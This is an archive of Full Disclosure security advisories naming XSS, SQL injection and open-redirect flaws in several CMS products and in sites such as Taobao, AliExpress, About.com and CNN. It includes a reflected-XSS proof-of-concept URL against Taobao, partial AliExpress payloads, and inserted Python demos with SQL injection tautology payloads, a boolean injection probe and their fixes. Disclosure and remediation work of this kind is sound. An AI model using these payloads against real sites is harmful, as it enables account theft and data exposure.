CVE Reference: CVE-2014-8753
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*
*(1) Vendor & Product Description:*

*Vendor:*
Cit-e-Net

*Product & Version: *
Cit-e-Access
Version 6

*Vendor URL & Download: *
Cit-e-Net can be downloaded from here,
https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf
http://demo.cit-e.net/
http://www.cit-e.net/demorequest.cfm
http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17

*Product Introduction:*
"We are a premier provider of Internet-based solutions encompassing web
site development and modular interactive e-government applications which
bring local government, residents and community businesses together."

"Cit-e-Net provides a suite of on-line interactive services to counties,
municipalities, and other government agencies, that they in turn can offer
to their constituents. The municipal government achieves a greater degree
of efficiency and timeliness in conducting the daily operations of
government, while residents receive improved and easier access to city hall
through the on-line access to government services."




*(2) Vulnerability Details:*
Cit-e-Access has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at "/eventscalendar/index.cfm?" page
with "&DID" parameter in HTTP GET.

*(2.2)* The second vulnerability occurs at "/search/index.cfm?" page with
"&keyword" parameter in HTTP POST.

*(2.3)* The third vulnerability occurs at "/news/index.cfm" page with
"&jump2" and "&DID" parameters in HTTP GET.

*(2.4)* The fourth vulnerability occurs at "eventscalendar?" page with
"&TPID" parameter in HTTP GET.

*(2.5)* The fifth vulnerability occurs at "/meetings/index.cfm?" page with
"&DID" parameter in HTTP GET.




*(3) Solutions:*
Left a message with the vendor. No response.
http://www.cit-e.net/contact.cfm









*References:*
http://tetraph.com/security/cves/cve-2014-8753-cit-e-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-8753-cit-e-net-multiple-xss.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8753
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8753
https://security-tracker.debian.org/tracker/CVE-2014-8753
http://www.cvedetails.com/cve/CVE-2014-8753/
http://www.security-database.com/detail.php?alert=CVE-2014-8753
http://packetstormsecurity.com/files/cve/CVE-2014-8753
http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/
http://www.pentest.it/cve-2014-8753.html
http://www.naked-security.com/cve/CVE-2014-8753/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/
http://007software.net/cve-2014-8753/
https://itinfotechnology.wordpress.com/2015/02/12/cve-2014-8753/







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing



[FD] My Little Forum Multiple XSS Security Vulnerabilities

2015-02-03 Thread Jing Wang
*My Little Forum Multiple XSS Security Vulnerabilities*




Exploit Title: My Little Forum Multiple XSS Security Vulnerabilities
Vendor: My Little Forum
Product: My Little Forum
Vulnerable Versions: 2.3.3  2.2  1.7
Tested Version: 2.3.3  2.2  1.7
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Advisory Details:*

*(1) Vendor & Product Description*

*Vendor:*
My Little Forum



*Product & Version:*
My Little Forum
2.3.3
2.2
1.7



*Vendor URL & Download:*
http://mylittleforum.net/




*Product Description:*
“my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded view (tree structure). It is
Open Source licensed under the GNU General Public License. The main claim
of this web forum is simplicity. Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.”






*(2) Vulnerability Details:*
My Little Forum has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at "forum.php?" page with "page",
"category" parameters.




*(2.2)* The second vulnerability occurs at "board_entry.php?" page with
"page", "order" parameters.




*(2.3)* The third vulnerability occurs at "forum_entry.php" page with
"order", "page" parameters.








*References:*
http://tetraph.com/security/xss-vulnerability/my-little-forum-multiple-xss-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/my-little-forum-multiple-xss-security.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities

2015-02-02 Thread Jing Wang
*About Group (about.com) All Topics (At least 99.88%
links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com
Open Redirect Security Vulnerabilities*




*Vulnerability Description:*
All of About.com's "topic sites" are vulnerable to XSS (Cross-Site Scripting)
and Iframe Injection (Cross Frame Scripting) attacks. This means all
sub-domains of about.com are affected. Based on a self-written program,
94357 links were tested. Only 118 links do not belong to the topic
(Metasite) links. Meanwhile, some about.com main pages are vulnerable to
XSS attacks, too. This means no more than 0.125% of the links are not
affected; at least 99.875% of About Group's links are vulnerable to XSS and
Iframe Injection attacks. In fact, given about.com's structure, the main
domain is little more than a cover, so very few links belong to it.

Simultaneously, the About.com main page's search field is vulnerable to XSS
attacks, too. This means all domains related to about.com are vulnerable to
XSS attacks.

As for the Iframe Injection vulnerabilities, they can be used to perform DoS
(Denial-of-Service) attacks against other websites, too.

Finally, some "Open Redirect" vulnerabilities related to about.com are
introduced. There may be a large number of other Open Redirect
vulnerabilities not yet detected. Since About.com is trusted by some other
websites, those vulnerabilities can be used to perform "Covert Redirect"
attacks against these websites.





*Vulnerability Disclosure:*
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No
one replied. As of now, they are still unpatched.





*Vulnerability Discoverer:*
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing






*(1) Some Basic Background*

*(1.1) Domain Description:*
http://www.about.com/

"For March 2014, 61,428,000 unique visitors were registered by comScore for
About.com, making it the 16th-most-visited online property for that month."
(The New York Times)

"About.com, also known as The About Group (formerly About Inc.), is an
Internet-based network of content that publishes articles and videos about
various subjects on its "topic sites," of which there are nearly 1,000. The
website competes with other online resource sites and encyclopedias,
including those of the Wikimedia Foundation" (Wikipedia)

"As of May 2013, About.com was receiving about 84 million unique monthly
visitors." (TechCrunch. AOL Inc.)

"According to About's online media kit, nearly 1,000 "Experts" (freelance
writers) contribute to the site by writing on various topics, including
healthcare and travel." (About.com)




*(1.2) Topics Related to About.com*
"The Revolutionary About.com Directory and Community Metasite. Hundreds of
real live passionate Guides covering Arts, Entertainment, Business,
Industry, Science, Technology, Culture, Health, Fitness, Games,Travel,
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,
Education, Computers, Hobbies and Local Information." (azlist.about.com)

About.com - Sites A to Z
Number of Topics
A: 66
B: 61
C: 118
D: 49
E: 33
F: 57
G: 39
H: 48
I: 32
J: 15
K: 13
L: 36
M: 70
N: 26
O: 23
P: 91
Q: 4
R: 32
S: 104
T: 47
U: 12
V: 9
W: 43
X: 1
Y: 4
Z: 1
SUM: 1039

Reference:
azlist.about.com/

In fact, those are not all the topics of about.com. Some topics are not
listed there, such as
http://specialchildren.about.com

So there are more than 1000 topics related to about.com.





*(1.3) Result of Exploiting XSS Attacks*
"Exploited XSS is commonly used to achieve the following malicious results
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user’s web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks (DOS)
" (Acunetix)






*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*
"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific
cross-frame-scripting bug in a web browser to access private data on a
third-party website. The attacker induces the browser user to navigate to a
web page the attacker controls; the attacker's page loads a third-party
page in an HTML frame; and then JavaScript executing in the attacker's page
steals data from the third-party page." (OWASP)

"XFS also sometimes is used to describe an XSS attack which uses an HTML
frame in the attack. For example, an attacker might exploit a Cross Site
Scripting Flaw to inject a frame into a third-party web page; or an
attacker might create a page which uses a frame to load a third-party page
with an XSS flaw." (OWASP)






*(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation)
Vulnerabilities*
"An open redirect is an application that takes a parameter and redirects a
user to the parameter value 

[FD] CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site Scripting) Security Vulnerabilities

2015-02-02 Thread Jing Wang
*CVE-2014-9562 OptimalSite Content Management System (CMS) XSS (Cross-Site
Scripting) Security Vulnerabilities*





Exploit Title:  OptimalSite CMS /display_dialog.php image Parameter XSS
Security Vulnerability
Vendor: OptimalSite
Product: OptimalSite Content Management System (CMS)
Vulnerable Versions: V.1 V2.4
Tested Version: V.1 V2.4
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9562
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Advisory Details:*

*(1) Vendor & Product Description*

*Vendor:*
OptimalSite


*Product & Version:*
OptimalSite Content Management System (CMS)
V.1
V2.4


*Vendor URL & Download:*
http://www.optimalsite.com/en/



*Product Description:*
“Content management system OptimalSite is an online software package that
enables the management of information published on a website.”

“OptimalSite consists of the system core and integrated modules, which
allow expanding website possibilities and functionality. You may select a
set of modules that suits your needs best.”





*(2) Vulnerability Details:*
OptimalSite Content Management System (CMS) has a security problem. It can
be exploited by XSS attacks.

*(2.1)* The vulnerability occurs at “display_dialog.php” page with “image”
parameter.







*References:*
http://tetraph.com/security/cves/cve-2014-9562-optimalsite-content-management-system-cms-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9562-optimalsite-content.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9562
https://security-tracker.debian.org/tracker/CVE-2014-9562
http://www.cvedetails.com/cve/CVE-2014-9562/
http://www.security-database.com/detail.php?alert=CVE-2014-9562
http://packetstormsecurity.com/files/cve/CVE-2014-9562
http://www.pentest.it/cve-2014-9562.html
http://www.naked-security.com/cve/CVE-2014-9562/
http://007software.net/cve-2014-9562/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-31 Thread Jing Wang
CVE-2014-9559 SnipSnap XSS (Cross-Site Scripting) Security Vulnerabilities

Exploit Title: SnipSnap /snipsnap-search? query Parameter XSS
Product: SnipSnap
Vulnerable Versions: 0.5.2a  1.0b1  1.0b2
Tested Version: 0.5.2a  1.0b1  1.0b2
Advisory Publication: Jan 30, 2015
Latest Update: Jan 30, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9559
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





Advisory Details:


(1) Vendor & Product Description

Vendor:
SnipSnap

Product & Version:
SnipSnap
0.5.2a
1.0b1
1.0b2


Vendor URL & Download:
http://snipsnap.org

Product Description:
"SnipSnap is a user friendly content management system with features such
as wiki and weblog."







(2) Vulnerability Details:
SnipSnap has a security problem. It can be exploited by XSS attacks.

(2.1) The vulnerability occurs at "snipsnap-search?" page with "query"
parameter.






References:
http://tetraph.com/security/cves/cve-2014-9559-snipsnap-xss-cross-site-scripting-security-vulnerabilities/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9559
https://security-tracker.debian.org/tracker/CVE-2014-9559
http://www.cvedetails.com/cve/CVE-2014-9559/
http://www.security-database.com/detail.php?alert=CVE-2014-9559
http://packetstormsecurity.com/files/cve/CVE-2014-9559
http://www.pentest.it/cve-2014-9559.html
http://www.naked-security.com/cve/CVE-2014-9559/
http://007software.net/cve-2014-9559/






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/



[FD] Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS & Open Redirect Security Vulnerabilities

2015-01-22 Thread Jing Wang
*Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website XSS
& Open Redirect Security Vulnerabilities*

*Domains Basic:*
Alibaba Taobao, AliExpress, Tmall are the top three online shopping
websites belonging to Alibaba.

Vulnerability Discoverer:
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/



*(1) Domains Description:*


*(1.1)* http://www.taobao.com

“Taobao is a Chinese website for online shopping similar to eBay and Amazon
that is operated in China by Alibaba Group.” (Wikipedia)

“With around 760 million product listings as of March 2013, Taobao
Marketplace is one of the world’s top 10 most visited websites according to
Alexa. For the year ended March 31, 2013, the combined gross merchandise
volume (GMV) of Taobao Marketplace and Tmall.com exceeded 1 trillion yuan.”
(Wikipedia)

Alexa ranking 9 at 10:40 am Thursday, 22 January 2015 (GMT+8).


*(1.2)* http://aliexpress.com

"Launched in 2010, AliExpress.com is an online retail service made up of
mostly small Chinese businesses offering products to international online
buyers. It is the most visited e-commerce website in Russia" (Wikipedia)


*(1.3)* http://www.tmall.com

"Taobao Mall, is a Chinese-language website for business-to-consumer (B2C)
online retail, spun off from Taobao, operated in the People's Republic of
China by Alibaba Group. It is a platform for local Chinese and
international businesses to sell brand name goods to consumers in mainland
China, Hong Kong, Macau and Taiwan." (Wikipedia)





*(2) Vulnerability descriptions:*
The Alibaba Taobao, AliExpress and Tmall online electronic shopping websites
have a security problem. They can be exploited by XSS and Covert Redirect
attacks.





*(3) Alibaba Taobao, AliExpress, Tmall, Online Electronic Shopping Website
XSS Security Vulnerabilities*

The vulnerability can be exploited without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (8.0.7601) in Windows 7.



*(3.1) Alibaba Taobao Online Electronic Shopping Website (Taobao.com) XSS
(cross site scripting) Security Vulnerability*

The vulnerabilities occur at the "writecookie.php?" page with the "ck"
parameter, e.g.
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw&redirect=0

*POC Code:*
http://www.taobao.com/go/rgn/tw/writecookie.php?ck=tw"-->'-alert(/tetraph/
)-'";&redirect=0


*POC Video:*
https://www.youtube.com/watch?v=cLzKxZ74i6Q&feature=youtu.be
*Blog Details:*
http://securityrelated.blogspot.com/2015/01/alibaba-taobao-online-electronic.html




*(3.2) Alibaba AliExpress Online Electronic Shopping Website
(Aliexpress.com) XSS Security Vulnerabilities*

The vulnerabilities occur at the "landing.php?" page with the "cateid" and
"fromapp" parameters, e.g.
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=3&fromapp=

*POC Code:*
/' ">
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6&fromapp=/'
">
http://activities.aliexpress.com/mobile_325_promotion_landing.php?cateid=6/'
">
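The (3.1) POC above reflects the "ck" value into the Taobao page so that a double quote ends the string it sits in. As an added example that is not Alibaba's code nor the advisory's, the Python below models the value landing inside a JavaScript string literal in an inline script, shows why the quoted payload breaks out of that literal, and demonstrates two defender-side checks: an allowlist on the region code and a round-trip check that the rendered literal still decodes to the original value. The inline-script template, all function names, and the assumption that "ck" is a two-letter region code (from the sample value "tw") are mine, not taken from taobao.com.

```python
import json
import re

# The value from the advisory's POC URL (constructed here as a Python string; it is the
# same text the page quotes). It ends a double-quoted JS string early and smuggles "-->".
ADVISORY_PAYLOAD = 'tw"-->\'-alert(/tetraph/)-\'";'

# Hypothetical inline-script template. The real writecookie.php markup is not on the
# page; this only models the context the payload targets: a JS string literal.
TEMPLATE = '<script>var region = {literal}; setRegionCookie(region);</script>'


def render_naive(ck):
    """Vulnerable rendering: the raw parameter is wrapped in double quotes, so any '"'
    in the input terminates the literal and the rest is parsed as JavaScript code."""
    return TEMPLATE.format(literal='"' + ck + '"')


def js_string_literal(value):
    """Encode an untrusted value as a JS string literal that is safe inside <script>.
    json.dumps handles quotes, backslashes and control characters; '<', '>' and '&'
    are additionally \\u-escaped so the HTML parser can never see '</script>' or
    '-->' inside the literal (JSON \\uXXXX escapes are valid in JS strings)."""
    return (json.dumps(value)
            .replace('<', '\\u003c')
            .replace('>', '\\u003e')
            .replace('&', '\\u0026'))


def render_hardened(ck):
    """Fixed rendering: whatever the input, it can only ever be a string in the script."""
    return TEMPLATE.format(literal=js_string_literal(ck))


# Assumption (mine): the sample value "tw" is a two-letter region code, so the parameter
# can be allowlisted before it reaches any template at all.
REGION_RE = re.compile(r'[a-z]{2}')


def accept_region(ck):
    """Allowlist check: True only for exactly two lowercase ASCII letters."""
    return REGION_RE.fullmatch(ck) is not None


def literal_round_trips(html, original):
    """Regression-test helper: read the value back out of the rendered script and
    require that it is ONE string literal decoding to the original. If the input
    broke out of the literal, the slice is not a single JSON string any more."""
    m = re.search(r'var region = (.*); setRegionCookie\(region\)', html, re.S)
    if not m:
        return False
    try:
        return json.loads(m.group(1)) == original
    except ValueError:          # json.JSONDecodeError is a subclass of ValueError
        return False


if __name__ == '__main__':
    for name, render in (('naive', render_naive), ('hardened', render_hardened)):
        html = render(ADVISORY_PAYLOAD)
        print(f'{name:9s} literal intact: {literal_round_trips(html, ADVISORY_PAYLOAD)}')
        print('          ', html)
    print('allowlist accepts payload:', accept_region(ADVISORY_PAYLOAD))
```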

[FD] CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9557 SmartCMS Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple XSS Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9557
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]





*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor: *Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description: *
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”



*(2) Vulnerability Details:*

SmartCMS v.2 has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at “index.php?” page with “pageid”
“lang” multiple parameters.

*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid” “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9557-smartcms-multiple-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9557
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9557
https://security-tracker.debian.org/tracker/CVE-2014-9557
http://www.cvedetails.com/cve/CVE-2014-9557/
http://www.security-database.com/detail.php?alert=CVE-2014-9557
http://packetstormsecurity.com/files/cve/CVE-2014-9557
http://www.pentest.it/cve-2014-9557.html
http://www.naked-security.com/cve/CVE-2014-9557/
http://007software.net/cve-2014-9557/








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities

2015-01-22 Thread Jing Wang
*CVE-2014-9558 SmartCMS Multiple SQL Injection Security Vulnerabilities*

Exploit Title: Smartwebsites SmartCMS v.2 Multiple SQL Injection Security
Vulnerabilities
Product: SmartCMS v.2
Vendor: Smartwebsites
Vulnerable Versions: v.2
Tested Version: v.2
Advisory Publication: Jan 22, 2015
Latest Update: Jan 22, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: CVE-2014-9558
Credit: Wang Jing [MAS, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description*

*Vendor:* Smartwebsites

*Product & Version:* SmartCMS v.2

*Vendor URL & Download:*
http://www.smartwebsites.com.cy/index.php?pageid=13&lang=en

*Product Description:*
“SmartCMS is one of the most user friendly and smart content management
systems there is in the Cyprus market. It makes the content management of a
webpage very easy and simple, regardless of the user’s technical skills.”




*(2) Vulnerability Details:*

SmartCMS v.2 has a security vulnerability. It can be exploited by SQL
Injection attacks.

*(2.1)* The first vulnerability occurs at “index.php?” page with “pageid”,
“lang” multiple parameters.

*(2.2)* The second vulnerability occurs at “sitemap.php?” page with
“pageid”, “lang” multiple parameters.







*References:*
http://www.tetraph.com/security/cves/cve-2014-9558-smartcms-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9558
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9558
https://security-tracker.debian.org/tracker/CVE-2014-9558
http://www.cvedetails.com/cve/CVE-2014-9558/
http://www.security-database.com/detail.php?alert=CVE-2014-9558
http://packetstormsecurity.com/files/cve/CVE-2014-9558
http://www.pentest.it/cve-2014-9558.html
http://www.naked-security.com/cve/CVE-2014-9558/
http://007software.net/cve-2014-9558/







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/


[FD] CVE-2014-9561 Softbb.net SoftBB XSS (Cross-Site Scripting) Security Vulnerability

2015-01-10 Thread Jing Wang
CVE-2014-9561 Softbb.net SoftBB XSS (Cross-Site Scripting) Security
Vulnerability




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
XSS
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9561
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by XSS Attacks.


*(2.1)* The vulnerability occurs on the “/redir_last_post_list.php” page, with
the “&post” parameter.






*References:*
http://tetraph.com/security/cves/cve-2014-9561-softbb-net-softbb-xss-cross-site-scripting-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9561
http://www.cvedetails.com/cve/CVE-2006-4593/







--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore


[FD] CVE-2014-9560 Softbb.net SoftBB SQL Injection Security Vulnerability

2015-01-10 Thread Jing Wang
*CVE-2014-9560 Softbb.net SoftBB SQL Injection Security Vulnerability*




Exploit Title: Softbb.net SoftBB /redir_last_post_list.php post Parameter
SQL Injection
Product: SoftBB (mods)
Vendor: Softbb.net
Vulnerable Versions: v0.1.3
Tested Version: v0.1.3
Advisory Publication: Jan 10, 2015
Latest Update: Jan 10, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') (CWE-89)
CVE Reference: CVE-2014-9560
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]






*Advisory Details:*


*Vendor URL:*
http://www.softbb.net/



*(2) Vulnerability Details:*
Softbb.net SoftBB can be exploited by SQL Injection attacks.


*(2.1)* The vulnerability occurs on the “/redir_last_post_list.php” page, with
the “&post” parameter.




*References:*
http://tetraph.com/security/cves/cve-2014-9560-softbb-net-softbb-sql-injection-security-vulnerability/
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9560
http://www.cvedetails.com/cve/CVE-2006-1327/








--
Wang Jing
School of Physical and Mathematical Sciences (SPMS)
Nanyang Technological University (NTU), Singapore

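The two SQL injection advisories above (SmartCMS "pageid"/"lang", SoftBB "post") only name the page and parameter. The following is an added example, not code from SmartCMS, SoftBB or the advisory author: a minimal CMS lookup in the vulnerable form, the parameterised form, and the boolean-based probe a tester uses to tell them apart. The sqlite schema, rows and the table/column names are constructed for this demo and are assumptions.

```python
"""Added example (not SmartCMS/SoftBB code): CWE-89 on CMS-style "pageid"/"lang"
parameters, the bound-parameter fix, and a boolean-based injection probe.
Schema, rows and names are constructed for the demo (assumptions)."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data resembling a small multilingual CMS."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE pages (pageid INTEGER, lang TEXT, title TEXT, published INTEGER)"
    )
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?, ?)",
        [
            (13, "en", "About us", 1),
            (13, "el", "Sxetika me emas", 1),
            (14, "en", "Draft pricing page", 0),  # unpublished: must never be served
        ],
    )
    return conn


def lookup_vulnerable(conn, pageid: str, lang: str) -> list:
    """The broken pattern: request parameters formatted straight into the SQL text."""
    sql = (
        "SELECT pageid, lang, title FROM pages "
        f"WHERE pageid = {pageid} AND lang = '{lang}' AND published = 1"
    )
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, pageid: str, lang: str) -> list:
    """Bound parameters: the input can only ever be a value, never query syntax.
    pageid is coerced to int so a non-numeric value fails closed (ValueError)."""
    sql = (
        "SELECT pageid, lang, title FROM pages "
        "WHERE pageid = ? AND lang = ? AND published = 1"
    )
    return conn.execute(sql, (int(pageid), lang)).fetchall()


def boolean_probe(conn, lookup, pageid: str, lang: str) -> bool:
    """Boolean-based detection: append a true and a false predicate to a known-good
    value.  If the two results differ, the predicate reached the database, i.e. the
    parameter is injectable.  Works the same way against a live HTTP endpoint by
    comparing response bodies instead of row lists."""
    true_case = lookup(conn, pageid, lang + "' AND '1'='1")
    false_case = lookup(conn, pageid, lang + "' AND '1'='2")
    return true_case != false_case


if __name__ == "__main__":
    db = make_db()
    # String context: close the quote, add a tautology, comment out the rest.
    print(lookup_vulnerable(db, "13", "en' OR 1=1 --"))   # all three rows, draft included
    # Numeric context: no quote character needed at all.
    print(lookup_vulnerable(db, "14 OR 1=1 --", "en"))    # all three rows again
    print(lookup_fixed(db, "13", "en' OR 1=1 --"))         # []: treated as a literal language code
    print(boolean_probe(db, lookup_vulnerable, "13", "en"),
          boolean_probe(db, lookup_fixed, "13", "en"))     # True False
```

The numeric case is the one that escaping-based "fixes" miss: `pageid` never needs a quote, so addslashes-style filtering of the `lang` parameter leaves it fully injectable. The probe sends no destructive payload and is the check to run before reporting a parameter as injectable.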

[FD] CNN cnn.com Travel XSS and ADS Open Redirect Security Vulnerabilities

2014-12-29 Thread Jing Wang
*CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Security Vulnerability*



*Domain:*
http://cnn.com

"CNN is sometimes referred to as CNN/U.S. to distinguish the American
channel from its international sister network, CNN International. As of
August 2010, CNN is available in over 100 million U.S. households.
Broadcast coverage of the U.S. channel extends to over 890,000 American
hotel rooms, as well as carriage on cable and satellite providers
throughout Canada. Globally, CNN programming airs through CNN
International, which can be seen by viewers in over 212 countries and
territories." (Wikipedia)

"As of August 2013, CNN is available to approximately 98,496,000 cable,
satellite and telco television households (86% of households with at least
one television set) in the United States." (Wikipedia)






*Vulnerability Description:*

CNN has a security problem. It can be exploited by XSS (Cross Site
Scripting) and Open Redirect attacks.

Based on published news, CNN users were hacked through both Open Redirect
and XSS vulnerabilities.

According to E Hacker News on June 06, 2013, "(@BreakTheSec) came across a
diet spam campaign that leverages the open redirect vulnerability in one of
the top News organization CNN."

After the attack, CNN took measures to detect Open Redirect
vulnerabilities. The measures are quite good: almost no links on CNN's
website are vulnerable to Open Redirect attacks now, and it takes a long
time to find a new, unpatched Open Redirect vulnerability on its website.

CNN.com was hacked via Open Redirect in 2013, while the XSS attacks happened
in 2007.



*<1>*  "The tweet apparently shows cyber criminals managed to leverage the
open redirect security flaw in the CNN to redirect twitter users to the
Diet spam websites." (E Hacker News)

At the same time, the cybercriminals have also leveraged a similar
vulnerability in a Yahoo domain to trick users into thinking that the links
point to a trusted website.

Yahoo Open Redirect Vulnerabilities:
http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html



*<2>* CNN.com XSS hacked
http://seclists.org/fulldisclosure/2007/Aug/216







*(1) CNN (cnn.com) Travel-City Related Links XSS (cross site scripting)
Security Vulnerabilities*



*Domain:*
http://travel.cnn.com/



*Vulnerability Description:*

The vulnerabilities occur at "http://travel.cnn.com/city/all" pages. All
links under this URL are vulnerable to XSS attacks, e.g.
http://travel.cnn.com/city/all/all/washington?page=0%2C1
http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1


The vulnerability can be exploited without user login. Tests were performed
on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.


*Poc Code:*
